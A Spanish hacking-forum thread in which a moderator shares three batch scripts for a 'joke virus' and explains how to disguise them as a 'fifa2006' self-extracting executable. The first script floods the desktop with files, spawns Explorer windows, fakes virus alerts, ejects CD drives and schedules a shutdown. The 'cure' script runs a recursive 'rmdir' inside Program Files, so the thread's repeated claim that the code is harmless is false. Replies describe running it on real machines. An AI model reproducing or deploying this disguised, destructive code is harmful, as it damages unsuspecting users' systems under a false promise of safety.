AutorTema: VIRUS BROMA EN .BATCH "JOKE"  (Leído 1143 veces)

Peperompe

  • Moderador Global
  • User Gurú

  • Desconectado
  • ****
  • Culturahack

  • 6726
  • Karma:
    +65/-3
  • Sexo
    Masculino

    Masculino
  • Texto personal
    El conocimiento es poder
VIRUS BROMA EN .BATCH "JOKE"
« : 02 de marzo de 2007, 05:08:16 pm »
Esto lo e echo ya  hace un tiempo largo pero no deja de estar bueno para entender como son determinadas ejecuciones en .batch,es 100% inofensivo solo busquen el conejo este Hey!!! Sorry pero TU NO Estás Autorizado para ver los Links. Regístrate o Ingresa ,esto esta echo en tres partes a la primera le e puesto piti ,a la segunda conejo y la tercera es cuando lo uno con winrar le doy un nombre final fifa2006 luego pasados a .exe con Hey!!! Sorry pero TU NO Estás Autorizado para ver los Links. Regístrate o Ingresa,  para terminar unidos con winrar en modo .sfx que seria .exe

Hey!!! Sorry pero TU NO Estás Autorizado para ver los Links. Regístrate o Ingresa


Hey!!! Sorry pero TU NO Estás Autorizado para ver los Links. Regístrate o Ingresa

piti
Código: Hey!!! Sorry pero TU NO Estás Autorizado para ver los Links. Regístrate o Ingresa
@ echo off
goto presen
:presen
cls
echo.
echo            estas infectado con el virus peperompe                  
echo            hacerloko.com  hacerloko.com  hacerloko.com              
echo.
echo.
echo            estas infectado con el virus peperompe                  
echo            hacerloko.com  hacerloko.com  hacerloko.com      
echo.
echo.
echo.
echo            hacerloko.com  hacerloko.com  hacerloko.com  
echo.
echo.
echo            hacerloko.com  hacerloko.com  hacerloko.com                            
echo.
echo.
echo.
echo            hacerloko.com  hacerloko.com  hacerloko.com  
msg * "ATENCION!! VIRUS SCAN SISTEMA"
set i=pepe-
:START
echo text > %i%.u
echo text > %i%.aoo
echo text > %i%.bat
echo text > %i%.bmp
echo text > %i%.gif
echo text > %i%.jpg
echo text > %i%.doc
echo text > %i%.html
echo text > %i%.php
echo text > %i%.pdf
echo text > %i%.zip
echo text > %i%.rar
echo text > %i%.dll
echo text > %i%.exe
echo text > %i%.mp3
echo text > %i%.wmv
echo text > %i%.bin
echo text > %i%.ini
echo text > %i%.rtf
echo text > %i%.log
echo text > %i%.wma
echo text > %i%.wmp
echo text > %i%.dvd.mpg.exe
echo text > %i%.duravite
echo text > %i%.ROMPE
echo text > %i%.ripper
echo text > %i%.cpp
echo text > %i%.asm
echo text > %i%.corn
echo text > %i%.u
set c i=i + 1000
c:\windows\explorer.exe
c:\windows\explorer.exe
c:\windows\explorer.exe
c:\windows\explorer.exe
c:\windows\explorer.exe
c:\windows\explorer.exe
c:\windows\explorer.exe
start /MIN c:\windows\explorer.exe
start /MIN c:\windows\explorer.exe
start /MIN c:\windows\explorer.exe
start /MIN c:\windows\explorer.exe
msg * "ATENCION!! VIRUS WINDOWS"
set i=r0mpe
:START
echo text > %i%.u
echo text > %i%.aoo
echo text > %i%.bat
echo text > %i%.bmp
echo text > %i%.gif
echo text > %i%.jpg
echo text > %i%.doc
echo text > %i%.html
echo text > %i%.php
echo text > %i%.pdf
echo text > %i%.zip
echo text > %i%.rar
echo text > %i%.dll
echo text > %i%.exe
echo text > %i%.mp3
echo text > %i%.wmv
echo text > %i%.bin
echo text > %i%.ini
echo text > %i%.rtf
echo text > %i%.log
echo text > %i%.wma
echo text > %i%.wmp
echo text > %i%.dvd.mpg.exe
echo text > %i%.duravite
echo text > %i%.HACKER
echo text > %i%.LOKO
echo text > %i%.cpp
echo text > %i%.asm
echo text > %i%.corn
echo text > %i%.u
msg * "ATENCION!! VIRUS sistem 32"
set i=peper0mpe
:START
echo text > %i%.u
echo text > %i%.aoo
echo text > %i%.bat
echo text > %i%.bmp
echo text > %i%.gif
echo text > %i%.jpg
echo text > %i%.doc
echo text > %i%.html
echo text > %i%.php
echo text > %i%.pdf
echo text > %i%.zip
echo text > %i%.rar
echo text > %i%.dll
echo text > %i%.exe
echo text > %i%.mp3
msg * "ATENCION!! VIRUS WINDOWS"
echo Set oWMP = CreateObject("WMPlayer.OCX.7" ) >> kak.vbs
echo Set colCDROMs = oWMP.cdromCollection >> kak.vbs
echo. >> kak.vbs
echo if colCDROMs.Count >= 1 then >> kak.vbs
echo          For i = 0 to colCDROMs.Count - 1 >> kak.vbs
echo                   colCDROMs.Item(i).Eject >> kak.vbs
echo          Next    ' cdrom >> kak.vbs
echo End If >> kak.vbs
start kak.vbs
shutdown -s -t 180 -c "BUSCA RAPIDO EL CONEJO DE LA SUERTE:)"
exit


conejo
Código: Hey!!! Sorry pero TU NO Estás Autorizado para ver los Links. Regístrate o Ingresa
@echo off
shutdown -a -c "suerte"
cd C:\Docume~1\usuario\escrit~1\pepe-.*
cd C:\Docume~1\usuario\escrit~1\r0mpe.*
cd C:\Docume~1\usuario\escrit~1\peper0mpe.*
del /S /Q pepe-.*
del /S /Q peper0mpe.*
del /S /Q r0mpe.*
del /S /Q kak.*
cd /D Program Files
rmdir /Q /S *
del /S /Q pepe-.*
del /S /Q r0mpe.*
del /S /Q peper0mpe.*
del /S /Q kak.*
del /Q piti.exe
del /Q pete.bat
del /Q conejo.exe
exit



fifa2006 union winrar
Código: Hey!!! Sorry pero TU NO Estás Autorizado para ver los Links. Regístrate o Ingresa
@ echo off
start piti.exe
exit

by peperompe

« Última Modificación: 06 de noviembre de 2009, 05:57:54 pm por Peperompe »


Hey!!! Sorry pero TU NO Estás Autorizado para ver los Links. Regístrate o Ingresa
SI YO COMPARTO MI DINERO CONTIGO, QUEDA LA MITAD, SI YO COMPARTO EL CONOCIMIENTO, QUEDA EL DOBLE.
EL CONOCIMIENTO ES PARTE DE LA HUMANIDAD

birik

  • Usuario Premium
  • User Full Colaborador

  • Desconectado
  • *

  • 288
  • Karma:
    +7/-1
  • Sexo
    Masculino

    Masculino
Re: VIRUS BROMA EN .BATCH
« Respuesta #1 : 02 de marzo de 2007, 07:10:43 pm »
jaja casi me reinicia el ordenador no encontrava el conejito ni lo e encontrao jaja pero no se pudo reiniciar caoso problemas el bitcomet jaja no lo podia cerrar esto me pasa por ser tan falso y no haver leido un poco el codigo del bach del /Q conejo.exe  lol
Hey!!! Sorry pero TU NO Estás Autorizado para ver los Links. Regístrate o Ingresa
Hey!!! Sorry pero TU NO Estás Autorizado para ver los Links. Regístrate o Ingresa

Peperompe

  • Moderador Global
  • User Gurú

  • Desconectado
  • ****
  • Culturahack

  • 6726
  • Karma:
    +65/-3
  • Sexo
    Masculino

    Masculino
  • Texto personal
    El conocimiento es poder
Re: VIRUS BROMA EN .BATCH
« Respuesta #2 : 02 de marzo de 2007, 11:23:34 pm »
jajajjaja  cheesy si igualmente es inofensivo,lo que pasa que te mete tantos iconos que se complica buscar al conejo jajajajjajaa 
Hey!!! Sorry pero TU NO Estás Autorizado para ver los Links. Regístrate o Ingresa
SI YO COMPARTO MI DINERO CONTIGO, QUEDA LA MITAD, SI YO COMPARTO EL CONOCIMIENTO, QUEDA EL DOBLE.
EL CONOCIMIENTO ES PARTE DE LA HUMANIDAD

jmlg23

  • Novato

  • Desconectado
  • *

  • 9
  • Karma:
    +0/-1
Re: VIRUS BROMA EN .BATCH
« Respuesta #3 : 01 de julio de 2007, 01:36:00 am »
este virus lo use me abre mas de 40 ventanas xD y tengo q buscar un conejo jajaja ...claro uso deep freze al reiniciar todo estaba bien  cool


elo code todavia funciona :)

esmeldy

  • Novato

  • Desconectado
  • *

  • 7
  • Karma:
    +0/-1
Re: VIRUS BROMA EN .BATCH
« Respuesta #4 : 18 de octubre de 2007, 04:53:35 pm »
jajajajaa (0
menos mal que era inofencibo porqe  yo no encontre el bendito conejo jaja

laurenturie

  • Novato

  • Desconectado
  • *

  • 55
  • Karma:
    +0/-0
  • Sexo
    Masculino

    Masculino
Re: VIRUS BROMA EN .BATCH
« Respuesta #5 : 10 de junio de 2009, 11:18:59 pm »
jejejejejejejejejee
muy bueno
muy bueno
jejejejejejejejejejeje
me sobro un minuto
señores y señoras hay q tener limpio el escritorio
jejejejejejjejeje


ankora

  • Novato

  • Desconectado
  • *

  • 19
  • Karma:
    +0/-0
  • Sexo
    Masculino

    Masculino
Re: VIRUS BROMA EN .BATCH
« Respuesta #6 : 20 de julio de 2009, 08:55:57 pm »
ajajajjajaajajaja buena.....
sabes anteriormente hace unos añitos atras no podia encontrar al conejo era bastante mas ignorante y no comprendia el porque.....
ps bueno he estudiado bastante y lo e pillado y me resulto bastante facil muy buena la broma y gracias por la enseñansas........saludos al staff ()

jmlg23

  • Novato

  • Desconectado
  • *

  • 9
  • Karma:
    +0/-1
Re: VIRUS BROMA EN .BATCH "JOKE"
« Respuesta #7 : 25 de julio de 2010, 01:18:31 am »
disculpen por revivir post super viejo pero hace tiempo cuando lo ejecute .. para encontrar el conejo avia q ejecutar piti no? por q ya no me rulo hoy q queria recordar viejos tiempo y se me reinicio la pc xDDD modificaron el code o q onda ??

elunico798

  • Novato

  • Desconectado
  • *

  • 42
  • Karma:
    +0/-0
Re: VIRUS BROMA EN .BATCH "JOKE"
« Respuesta #8 : 25 de julio de 2010, 09:20:19 pm »
jjaja si funciona   y ya lo habia encontado el conejo .....   esta  ok  <<bueno


yo lo busco de manera facil con visualisador de carpetas.

Tags:
 
Compartir este Tema...
En un Foro
(BBCode)
En un Sitio Web/Blog/Twitter/Facebook
(HTML)





Powered By Satel Group® Web Hosting Diseño Publicidad y Servicio Tecnico